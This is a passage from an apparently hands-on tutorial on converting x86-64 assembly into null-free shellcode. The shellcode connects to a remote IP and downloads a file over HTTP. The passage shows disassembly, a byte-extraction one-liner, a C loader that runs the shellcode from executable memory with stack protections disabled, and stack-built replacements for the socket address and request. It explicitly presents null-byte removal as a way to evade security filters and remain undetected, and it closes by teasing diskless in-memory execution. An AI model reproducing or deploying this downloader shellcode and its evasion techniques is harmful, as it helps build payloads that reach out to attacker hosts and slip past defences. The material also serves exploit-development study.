To continue, we might consider using assembly code to further our goals. We may think about things like inline assembly in the C code. No! what about shellcodes? I think it’s very amazing to convert our assembly code to shellcode. But everything will not be so simple and, especially for more complex code, we may modify the assembly code so the shellcode can perform correctly.
-> but not <-
have you tried to elicit shellcode from assembly code? Or rather, have you tried to convert assembly code to shellcode? It’s not just copying the byte codes of the object code from something like, objdump! If you do this you will see that your shellcode may not act properly. Virtually, we can conclude assembly from shellcode but the other way around. Honestly, we can conclude shellcode from assembly but it may not work as expected without any modification. For example, let’s convert the previously written assembly code to shellcode and execute that. First, let’s disassemble that with objdump. The result is something like this(for some IP address other than 1.2.3.4):
# objdump -d dl.o
dl.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 c7 c0 29 00 00 00 mov $0x29,%rax
7: 48 c7 c7 02 00 00 00 mov $0x2,%rdi
e: 48 c7 c6 01 00 00 00 mov $0x1,%rsi
15: 48 c7 c2 06 00 00 00 mov $0x6,%rdx
1c: 0f 05 syscall
1e: 48 85 c0 test %rax,%rax
21: 78 71 js 94 <_exit>
23: 48 89 c7 mov %rax,%rdi
26: 48 c7 c0 2a 00 00 00 mov $0x2a,%rax
2d: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 34 <_start+0x34>
34: 48 c7 c2 10 00 00 00 mov $0x10,%rdx
3b: 0f 05 syscall
3d: 48 85 c0 test %rax,%rax
40: 78 52 js 94 <_exit>
42: 48 c7 c0 2c 00 00 00 mov $0x2c,%rax
49: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 50 <_start+0x50>
50: 48 c7 c2 00 10 00 00 mov $0x1000,%rdx
57: 0f 05 syscall
59: 48 85 c0 test %rax,%rax
5c: 78 36 js 94 <_exit>
5e: 48 c7 c0 2d 00 00 00 mov $0x2d,%rax
65: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 6c <_start+0x6c>
6c: 48 c7 c2 00 10 00 00 mov $0x1000,%rdx
73: 0f 05 syscall
75: 48 85 c0 test %rax,%rax
78: 7e 1a jle 94 <_exit>
7a: 48 89 c2 mov %rax,%rdx
7d: 48 c7 c0 01 00 00 00 mov $0x1,%rax
84: 48 c7 c7 01 00 00 00 mov $0x1,%rdi
8b: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 92 <_start+0x92>
92: 0f 05 syscall
0000000000000094 <_exit>:
94: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
9b: 48 31 ff xor %rdi,%rdi
9e: 0f 05 syscall
BashAnd, we can use byte codes to generate our shellcode:
# objdump -d dl.o | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'
\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05
BashNow, let’s execute the shellcode to see if it works correctly. We can test that with a simple C program:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main(int argc, char **argv) {
unsigned char code[]=
"\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02"
"\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48"
"\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0"
"\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00"
"\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48"
"\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0"
"\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48"
"\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00"
"\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94"
"\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00"
"\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00"
"\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2"
"\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01"
"\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92"
"\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31"
"\xff\x0f\x05";
void *exec_mem = mmap(NULL, sizeof(code), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON |
MAP_PRIVATE, -1, 0);
if (exec_mem == MAP_FAILED) {
perror("mmap");
return 1;
}
memcpy(exec_mem, code, sizeof(code));
((void(*)())exec_mem)();
return 0;
}
CCompile it statically and even bypass stack protections:
# gcc --static -fno-stack-protector -z execstack test_shell.c -o test_shell
BashIf we execute the compiled program, we see that it does not work as expected(It may stop with segmentation fault, wrong syscalls, etc):
# ./test_shell
Segmentation fault (core dumped)
#strace ./test_shell
execve("./test_shell", ["./test_shell"], 0x7ffc1ac95500 /* 19 vars */) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffc8d4c7890) = -1 EINVAL (Invalid argument)
brk(NULL) = 0x1a2a000
brk(0x1a2adc0) = 0x1a2adc0
arch_prctl(ARCH_SET_FS, 0x1a2a3c0) = 0
set_tid_address(0x1a2a690) = 1338816
set_robust_list(0x1a2a6a0, 24) = 0
rseq(0x1a2ad60, 0x20, 0, 0x53053053) = 0
uname({sysname="Linux", nodename="XXXXXXXX", ...}) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
readlink("/proc/self/exe", "/home/XXX/XXXXX/shell/test_shell", 4096) = 25
getrandom("\xb4\xab\xfc\x2d\x89\x59\x51\x89", 8, GRND_NONBLOCK) = 8
brk(0x1a4bdc0) = 0x1a4bdc0
brk(0x1a4c000) = 0x1a4c000
mprotect(0x4c1000, 16384, PROT_READ) = 0
mmap(NULL, 169, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f740107d000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
getrusage(0x8d4c7638 /* RUSAGE_??? */, 0x7f740107d035) = -1 EINVAL (Invalid argument)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xffffffffffffffea} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
BashSo, what could be wrong with that?!
Null Bytes
Again, if we look at the shellcode charily, we will see some bytes like 0x00. These bytes are known as null bytes. A null byte, represented as \0 in programming, is a character with an ASCII value of zero. It is often used to signify the end of a string in languages like C and C++. This special character plays a crucial role in string manipulation and memory management, marking the termination point of a string so that functions know where the string ends. The presence of null bytes in shellcodes can cause significant issues:
- Premature Termination: Many functions that handle strings, such as strcpy in C, treat the null byte as the end of the string.If a shellcode contains null bytes, these functions may terminate the copy operation prematurely, leading to incomplete execution of the shellcode.
- Execution Failures: Shellcodes are often injected into memory spaces where they need to be executed without interruption.Null bytes can disrupt this process, causing the shellcode to fail or behave unpredictably.
- Detection and Prevention: Security mechanisms may detect null bytes as anomalies, flagging the shellcode as malicious.This can lead to the shellcode being blocked or removed before it can execute.
Preventing null bytes in shellcodes is essential for several reasons:
- Ensuring Complete Execution: By avoiding null bytes, we ensure that the entire shellcode is copied and executed as intended.This is crucial for the success of the exploit.
- Bypassing Security Filters: Many security systems and filters are designed to detect and block shellcodes containing null bytes. Crafting shellcodes without null bytes helps in evading these defenses.
- Maintaining Stealth: Null-free shellcodes are less likely to be detected by security mechanisms, allowing the exploit to proceed without raising alarms.
For example, null bytes in our shellcode cause a segmentation fault. It can has various reasons including:
- String Termination: As I said before, In C, null bytes (\0) are used to terminate strings. If the shellcode is treated as a string, the presence of null bytes can cause it to be truncated, leading to incomplete execution and potential segmentation faults.
- Memory Misalignment: Null bytes can cause memory misalignment issues. If the shellcode is not properly aligned in memory, it can lead to invalid memory access, resulting in segmentation faults.
- Null Pointer Dereferencing: If the shellcode inadvertently sets a pointer to NULL and then tries to dereference it, this will cause a segmentation fault because the program is trying to access an invalid memory location.
- System Call Arguments: Null bytes in the shellcode might affect the arguments passed to system calls. If a system call receives an unexpected null byte, it might interpret the arguments incorrectly, leading to invalid operations and segmentation faults.
- …
So it seems that the presence of null bytes makes our shellcode not work properly and we cannot use it to advance our goals(even though the assembly code works properly). So, let’s go see if we can make our shellcode null-free or not.
Null-free shellcode
I am determined to make the shellcode null-free, and I should say, I’m not bored explaining everything, and in my opinion, everyone who reads this can understand it completely(Otherwise here is the wrong place for him/her 😀 ).
Good! you have read this and checked the code carefully. As you know, there is some stuff in the .data section that was used in the .text section of the code(like sockaddr structure). For example, take a look at the following code:
lea sockaddr(%rip), %rsi
Whose corresponding in the disassembled code is equal to:
lea 0x0(%rip),%rsi
As you know, the instruction computes the address of the sockaddr structure, which is defined in the .data section, relative to the current instruction pointer, and then stores this address in the %rsi register. So, what is 0x0(%rip)? It means its address is exactly same as the current value of rip. just hooey 😀 and it totally normal. Obviously, the assembler cannot resolve the sockaddr address. So, the technique I will use for this challenge is removing the .data section and bringing everything into the .text section by using the stack in the whole technique.
The sockaddr structure represents an IPv4 socket address which includes address family(.word 2 or AF_INET for IPv4), port number(.word 0x5000), IP address(.byte 1, 2, 3, 4 in out example) and padding to make the structure 16 bytes.
As I said above, we need 16 bytes to store the sockaddr structure. So if we want to use the stack to do the job, we need to allocate 16 bytes on the stack:
sub $16, %rsp
Now, we should set the address family(2). There are two ways for doing this:
push $2
pop %ax
mov $ax, (%rsp)
And:
mov $0x2, %ax
mov %ax, (%rsp)
I choose one, because the second may create a null byte. You can test it 😀
The last instruction moves the value in ax(which is 2) to the memory location pointed to by rsp(the top of the stack).
For port number:
mov $0x1001, %ax
shl $2, %ax
add $0x0ffc, %ax
mov %ax, 2(%rsp)
Or simply:
mov $0x5000, %ax
mov %ax, 2(%rsp)
But I certainly choose the first one, and you know why 😀
For IP address:
mov $0x0201, %ax #little endian
mov %ax, 4(%rsp)
mov $0x0304, %ax #little endian
mov %ax, 6(%rsp)
The second instruction moves this value into the memory location 4 bytes from the top of the stack and the same for the forth.
Or we can change to:
mov $0x04030201, %eax
And let’s zero out remaining bytes:
xor %eax, %eax
mov %ax, 8(%rsp)
mov %ax, 10(%rsp)
mov %ax, 12(%rsp)
mov %ax, 14(%rsp)
That’s it for the sockaddr 🙂 and the same approach for the number of bytes for the connect syscall:
xor %eax, %eax
mov $42, %al
mov %rsp, %rsi
push $16
pop %rdx
syscall
We have another .data section that includes url, the path of the remote file, the http request, and the IP address. Ignore everything but http_request. We should give it the same hell we gave to sockaddr.
Consider “”GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n”” request line and headers(for simplicity I have removed some headers and changed the /file.txt to /f). We can build the request easily on the stack:
sub $64, %rsp
# "GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n"
mov $0x0a0d0a0d65736c6f, %rax # "se\r\n\r\n"
mov %rax, 48(%rsp)
mov $0x632020203a6e6f69, %rax # "ion: clo: "
mov %rax, 40(%rsp)
mov $0x7463656e6e6f430d, %rax # "\nConnect"
mov %rax, 32(%rsp)
mov $0x0a312e322e332e34, %rax # "1.2.3.4\r"
mov %rax, 24(%rsp)
mov $0x203a74736f480a0d, %rax # "\r\nHost: "
mov %rax, 16(%rsp)
mov $0x312e312f50545448, %rax # "HTTP/1.1"
mov %rax, 8(%rsp)
mov $0x2020662f20544547, %rax # "GET /f "
mov %rax, 0(%rsp)
Now, continue to use that in our sendto syscall:
xor %eax, %eax
mov $44, %al
mov %rsp, %rsi
push $64
pop %rdx
xor %r10,%r10
xor %r8,%r8
xor %r9,%r9
syscall
add $64, %rsp # Clean up the stack
Here, we used the data pushed on the stack for the second argument(%rsi) of sendto syscall. The length of the buffer is 64 as the third argument(%rdx). The rest of the arguments are 0, NULL and 0 are done by xor. Note that we must set these arguments, otherwise, for some assemblers, setting the syscall arguments may be problematic.
Finally, for the recvfrom syscall:
xor %eax, %eax
mov $45, %al
mov %rsp, %rsi
xor %rdx, %rdx
mov $0x101, %rdx
shl $4, %rdx
shl $2, %rdx
sub $0x40, %rdx
xor %r10,%r10
syscall
The buffer is on the stack as the second argument(%rsi) pointed by %rsp. The third argument is the buffer size which I set this to 16384.
Now, the party is over 😀 and if you check the null bytes in the shellcode you may see one, just for 0x101 that is not important(of course you can remove it by some mathematical operations to set the third argument of recvfrom syscall, but it’s up to you 😀 )
The code was pushed here(but for some another IP address not 1.2.3.4)
And then…?
Don’t say so much, then what, then what… But, What do you think if we can enter and execute this shellcode directly into the memory, without the intervention of the disk? 😀